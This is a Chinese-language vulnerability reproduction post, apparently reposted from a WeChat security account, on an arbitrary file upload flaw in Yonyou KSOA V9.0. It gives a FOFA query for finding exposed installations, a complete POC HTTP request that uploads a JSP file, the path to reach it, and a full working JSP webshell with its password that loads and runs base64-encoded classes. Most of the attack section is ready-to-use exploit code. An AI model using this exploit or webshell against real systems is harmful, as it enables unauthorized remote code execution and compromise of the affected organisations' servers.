用友时空 KSOA V9.0 文件上传漏洞

admin

102800
文章

87
评论

2023年7月3日05:14:58评论100 views字数 1539阅读5分7秒阅读模式

- 漏洞描述 -

用友时空KSOA V9.0存在一个文件上传漏洞，攻击者可以利用该漏洞上传任意文件，进而对系统进行攻击。

- 影响范围 -

用友时空 KSOA V9.0

- FOFA -

app="用友-时空KSOA"

- 漏洞复现 -

用友时空 KSOA V9.0 文件上传漏洞

漏洞URL

/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=

‍

POC请求包

POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=1.jsp HTTP/1.1Host: your-ipPragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: https://en.fofa.info/Accept-Encoding: gzip, deflateAccept-Language: en,zh-CN;q=0.9,zh;q=0.8Cookie: JSESSIONID=825A011F31259CCA1649D5DF4849635EConnection: closeContent-Length: 1
<%!your-payload%>

用友时空 KSOA V9.0 文件上传漏洞

访问 /pictures/1.jsp 即可。

Webshell

登录密码：passwd

<%!    class U extends ClassLoader {        U(ClassLoader c) {            super(c);        }        public Class g(byte[] b) {            return super.defineClass(b, 0, b.length);        }    }     public byte[] base64Decode(String str) throws Exception {        try {            Class clazz = Class.forName("sun.misc.BASE64Decoder");            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);        } catch (Exception e) {            Class clazz = Class.forName("java.util.Base64");            Object decoder = clazz.getMethod("getDecoder").invoke(null);            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);        }    }%><%    String cls = request.getParameter("passwd");    if (cls != null) {        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);    }%>

end

原文始发于微信公众号（安全攻防渗透）：知识分享19：用友时空 KSOA V9.0 文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

用友时空 KSOA V9.0 文件上传漏洞

Webshell

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信